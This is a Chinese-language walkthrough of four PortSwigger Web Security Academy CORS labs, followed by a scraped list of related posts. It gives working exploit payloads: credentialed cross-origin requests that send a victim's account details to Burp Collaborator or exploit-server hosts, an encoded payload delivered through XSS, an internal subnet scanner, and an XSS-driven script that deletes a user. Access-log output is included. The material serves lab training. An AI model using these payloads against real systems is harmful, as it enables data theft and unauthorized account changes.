Portswigger web security academy:Cross-origin resource sharing (CORS)
Portswigger web security academy:Cross-origin resource sharing (CORS)
1 - CORS vulnerability with basic origin reflection
题目描述
- 该网站的跨域设置不安全,允许所有跨域请求
要求
- 利用exploit server盗取管理员的API key并提交
解题步骤
借助burp collaborator或者exploit server(可以看access log)构造exp
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://ac271f7a1e02660580804cb3000300c9.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send(); function reqListener() {
location='//vonyssz4wkzwder4zhgbx1sp4ga6yv.burpcollaborator.net/?xxx='+this.responseText;
};
</script>
2 - CORS vulnerability with trusted null origin
题目描述
- 该网站的跨域设置不安全,允许origin为
null
- 该网站的跨域设置不安全,允许origin为
要求
- 利用exploit server盗取管理员的API key并提交
解题步骤
与上一题类似,多了个origin为null,而且材料里有介绍,沙盒化的
iframe标签可以达到目的构造exp
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://ac3b1ffa1feb2369806b670600350084.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send(); function reqListener() {
location='https://ace61fe51f0a23b5802567830182004a.web-security-academy.net/?log='+this.responseText;
};
</script>"></iframe>
3 - CORS vulnerability with trusted insecure protocols
题目描述
- 该网站的跨域设置不安全,会信任任何协议下的子域名
要求
- 利用exploit server盗取管理员的API key并提交
解题步骤
这道题前面的材料大概讲的是,从http协议发送的请求如果符合白名单,也可以以http协议访问目标网站
先按照之前的做法试试
构造exp
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://ac781f5a1e9aba28808b86e5002c0026.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send(); function reqListener() {
location='//acf61fe31e40ba0c809486e3018100b4.web-security-academy.net//?xxx='+this.responseText;
};
</script>
打了两次不太行,继续找找看
发现了个xss
如果从这个页面发起请求呢?试试看
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://ac781f5a1e9aba28808b86e5002c0026.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send(); function reqListener() {
location='https://acf61fe31e40ba0c809486e3018100b4.web-security-academy.net/?log='+this.responseText;
};
</script>
要借助xss跳转,所以需要把脚本编码一下
<script>
location.href="http://stock.ac781f5a1e9aba28808b86e5002c0026.web-security-academy.net/?productId=1%3c%73%63%72%69%70%74%3e%0a%76%61%72%20%72%65%71%20%3d%20%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%0a%72%65%71%2e%6f%6e%6c%6f%61%64%20%3d%20%72%65%71%4c%69%73%74%65%6e%65%72%3b%0a%72%65%71%2e%6f%70%65%6e%28%27%67%65%74%27%2c%27%68%74%74%70%73%3a%2f%2f%61%63%37%38%31%66%35%61%31%65%39%61%62%61%32%38%38%30%38%62%38%36%65%35%30%30%32%63%30%30%32%36%2e%77%65%62%2d%73%65%63%75%72%69%74%79%2d%61%63%61%64%65%6d%79%2e%6e%65%74%2f%61%63%63%6f%75%6e%74%44%65%74%61%69%6c%73%27%2c%74%72%75%65%29%3b%0a%72%65%71%2e%77%69%74%68%43%72%65%64%65%6e%74%69%61%6c%73%20%3d%20%74%72%75%65%3b%0a%72%65%71%2e%73%65%6e%64%28%29%3b%0a%0a%66%75%6e%63%74%69%6f%6e%20%72%65%71%4c%69%73%74%65%6e%65%72%28%29%20%7b%0a%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%73%3a%2f%2f%61%63%66%36%31%66%65%33%31%65%34%30%62%61%30%63%38%30%39%34%38%36%65%33%30%31%38%31%30%30%62%34%2e%77%65%62%2d%73%65%63%75%72%69%74%79%2d%61%63%61%64%65%6d%79%2e%6e%65%74%2f%3f%6c%6f%67%3d%27%2b%74%68%69%73%2e%72%65%73%70%6f%6e%73%65%54%65%78%74%3b%0a%7d%3b%0a%3c%2f%73%63%72%69%70%74%3e&storeId=1"</script>
4 - CORS vulnerability with internal network pivot attack
题目描述
- 该网站的跨域设置不安全,信任所有内部域
- 这道题需要很多步骤来完成
要求
- 构造js脚本来确定192.168.0.0/24 : 8080的端点,并使用CORS删除用户Carlos
解题过程
先探测主机
<script>
function requets(url){
var httpRequest = new XMLHttpRequest();
httpRequest.open('GET', url, true);
httpRequest.send();
httpRequest.onreadystatechange = function () {
if (httpRequest.readyState == 4 && httpRequest.status == 200) {
log_("text="+encodeURIComponent(httpRequest.responseText)+"&status="+httpRequest.status+"&url="+encodeURIComponent(url));
}
};
}
function log_(text){
var httpRequest = new XMLHttpRequest();
httpRequest.open('GET', 'http://ac4c1fb31f07440b80eb04200134002d.web-security-academy.net/' + '/?' + text, true);
httpRequest.send();
}
let base_url = "http://192.168.0."
let port = ":8080"
for(var i = 0; i <= 255; i++){
//console.log(base_url+i+port);
requets(base_url + i + port);
}
</script>
(前面把168写成了169,跑了n久。。。)
拿到结果
172.31.31.68 2021-02-28 07:18:20 +0000 "GET //?text=<!DOCTYPE html>
<html>
<head>
<link href=/resources/css/academyLabHeader.css rel=stylesheet>
<link href=/resources/css/labs.css rel=stylesheet>
<title>CORS vulnerability with internal network pivot attack</title>
</head>
<body>
<script src="/resources/js/labHeader.js"></script>
OcwOagRrckNCfllF3TWppsdzBjfhZsjLA
<div theme="">
<section class="maincontainer">
<div class="container is-page">
<header class="navigation-header">
<section class="top-links">
<a href=/>Home</a><p>|</p>
<a href="/my-account">My account</a><p>|</p>
</section>
</header>
<header class="notification-header">
</header>
<h1>Login</h1>
<section>
<form class=login-form method=POST action=/login>
<input required type="hidden" name="csrf" value="VjvMtjBrZmS0otrHqcYsJKzYpiRaf20s">
<label>Username</label>
<input required type=username name="username">
<label>Password</label>
<input required type=password name="password">
<button class=button type=submit> Log in </button>
</form>
</section>
</div>
</section>
</div>
</body>
</html>
&status=200&url=http://192.168.0.83:8080 HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36"
主机在
192.168.0.83:8080
接下来就是要想办法进入管理页面删除账号了,但是跨域是没有cookie的(直接使用上面的脚本,会提示只有管理员才能进入
/admin)需要构造js脚本,使受害者非跨域访问该页面,然后从该页面传回信息,这里卡住了,看了官方的solution,需要用到登录点的XSS(做完补的图)
构造exp(这是官方solution里的脚本)
<script>
function xss(url, text, vector) {
location = url + '/login?time='+Date.now()+'&username='+encodeURIComponent(vector)+'&password=test&csrf='+text.match(/csrf" value="([^"]+)"/)[1];
}
function fetchUrl(url, collaboratorURL){
//***** 首次访问页面,用于获取csrf token:xss函数中的text.match(),但是实际并没有登录,只是借用了登陆页面的xss,进行csrf
fetch(url).then(r=>r.text().then(text=>
{
xss(url, text, '"><iframe src=/admin onload="new Image().src=\''+collaboratorURL+'?code=\'+encodeURIComponent(this.contentWindow.document.body.innerHTML)">');
}
))
} fetchUrl("http://192.168.0.83:8080", "http://ac4c1fb31f07440b80eb04200134002d.web-security-academy.net/");
</script>
改良脚本
<script>
location = 'http://192.168.0.83:8080/login?username='+encodeURIComponent('"><iframe src=/admin onload="new Image().src=\'http://ac4c1fb31f07440b80eb04200134002d.web-security-academy.net/?code=\'+encodeURIComponent(this.contentWindow.document.body.innerHTML)">');
</script>
直接访问
/login页面,借助username的XSS进行CSRF,利用admin的cookie在iframe加载/admin页面返回
172.31.31.68 2021-02-28 08:29:52 +0000 "GET /?code=
<script src="/resources/js/labHeader.js"></script>
OcwOagRrckNCfllF3TWppsdzBjfhZsjLA
<div theme="">
<section class="maincontainer">
<div class="container is-page">
<header class="navigation-header">
<section class="top-links">
<a href="/">Home</a><p>|</p>
<a href="/admin">Admin panel</a><p>|</p>
<a href="/my-account?id=administrator">My account</a><p>|</p>
</section>
</header>
<header class="notification-header">
</header>
<form style="margin-top: 1em" class="login-form" action="/admin/delete" method="POST">
<input required="" type="hidden" name="csrf" value="jL2Q2cniqPJ9A23UkZ9RqfJiIVRQBT0u">
<label>Username</label>
<input required="" type="text" name="username">
<button class="button" type="submit">Delete user</button>
</form>
</div>
</section>
</div> HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36"
还是和上面一样,删除账号也用不到csrf token
构造exp
<script>
location = 'http://192.168.0.83:8080/login?username='+encodeURIComponent('"><iframe src=/admin onload="var x=this.contentWindow.document.forms[0];x.username.value=\'carlos\';x.submit();">');
</script>
Portswigger web security academy:Cross-origin resource sharing (CORS)的更多相关文章
- Portswigger web security academy:Cross-site request forgery (CSRF)
Portswigger web security academy:Cross-site request forgery (CSRF) 目录 Portswigger web security acade ...
- Portswigger web security academy:Stored XSS
Portswigger web security academy:Stored XSS 目录 Portswigger web security academy:Stored XSS Stored XS ...
- Portswigger web security academy:WebSockets
Portswigger web security academy:WebSockets 目录 Portswigger web security academy:WebSockets Lab: Mani ...
- Portswigger web security academy:Clickjacking (UI redressing)
Portswigger web security academy:Clickjacking (UI redressing) 目录 Portswigger web security academy:Cl ...
- Portswigger web security academy:XML external entity (XXE) injection
Portswigger web security academy:XML external entity (XXE) injection 目录 Portswigger web security aca ...
- Portswigger web security academy:OAth authentication vulnerable
Portswigger web security academy:OAth authentication vulnerable 目录 Portswigger web security academy: ...
- Portswigger web security academy:Server-side request forgery (SSRF)
Portswigger web security academy:Server-side request forgery (SSRF) 目录 Portswigger web security acad ...
- Portswigger web security academy:OS command injection
Portswigger web security academy:OS command injection 目录 Portswigger web security academy:OS command ...
- Portswigger web security academy:SQL injection
Portswigger web security academy:SQL injection 目录 Portswigger web security academy:SQL injection SQL ...
随机推荐
- 【DB宝42】MySQL高可用架构MHA+ProxySQL实现读写分离和负载均衡
目录 一.MHA+ProxySQL架构 二.快速搭建MHA环境 2.1 下载MHA镜像 2.2 编辑yml文件,创建MHA相关容器 2.3 安装docker-compose软件(若已安装,可忽略) 2 ...
- 鸿蒙OS前端开发入门指南:网络图片_Image渲染网络图片
目录: 1.开启明文传输 2.权限申请 3.引入http插件 4.案例展示 5.<鸿蒙OS前端开发入门指南>文章合集 开启明文传输 在config.json配置文件添加如下配置(如果不开启 ...
- Nodejs学习笔记(1) Nodejs安装+借助express模块简单部署服务器
1 安装 1.1 下载和安装 1.2 什么是REPL?如何使用? 1.3 npm对单一模块的安装和删除功能 1.4 通过package.json自定义模块(安装模块) 1.5 设置全局目录 2 部署网 ...
- pip软件包管理工具介绍及基本使用
pip软件包管理工具介绍及基本使用 一分耕耘,一分收获,要收获得好,必须耕耘得好.-- 徐特立 一.pip软件包管理工具介绍: 定义:pip是Python包管理工具 作用:对Python包的查找.下载 ...
- 12、MyBatis教程之缓存
13.缓存 简介 1.什么是缓存 [ Cache ]? 存在内存中的临时数据. 将用户经常查询的数据放在缓存(内存)中,用户去查询数据就不用从磁盘上(关系型数据库数据文件)查询,从缓存中查询,从而提高 ...
- Java中的IO流 - 入门篇
前言 大家好啊,我是汤圆,今天给大家带来的是<Java中的IO流-入门篇>,希望对大家有帮助,谢谢 由于Java的IO类有很多,这就导致我刚开始学的时候,感觉很乱,每次用到都是上网搜,结果 ...
- Java入门环境的搭建
入门环境搭建 Java帝国的诞生 C & C++ 1972年C诞生 贴近硬件,运行极快,效率极高 操作系统,编译器,数据库,网络系统等 指针和内存管理 1982年C++诞生 面向对象 兼容C ...
- 学习笔记-vue.js快捷登录 enter
一般监听在输入密码的input监听keyup事件,加enter修饰符.如果input是组件,加上.native修饰符.<div id="app"> <input ...
- 简单创建ASP.NET网站(1)
闲话 公司员工辞职了,我从原来的Delphi开发转型到ASP.NET开发,接受同时的相关工作,因为网上搜了视频学习,还是不觉得有什么提升,一脸懵逼,所以就买了书籍自己慢慢学习,为了加深记忆,我就记录一 ...
- Dynamics CRM安装教程七:Claims-based认证-内部访问配置
DFS安装配置好后就要开始配置CRM基于内部认证访问的配置,即使用HTTPS在CRM服务器进行访问的设置.在CRM服务器中找到Dynamic CRM部署管理器,开始菜单选择Dynamic CRM部署管 ...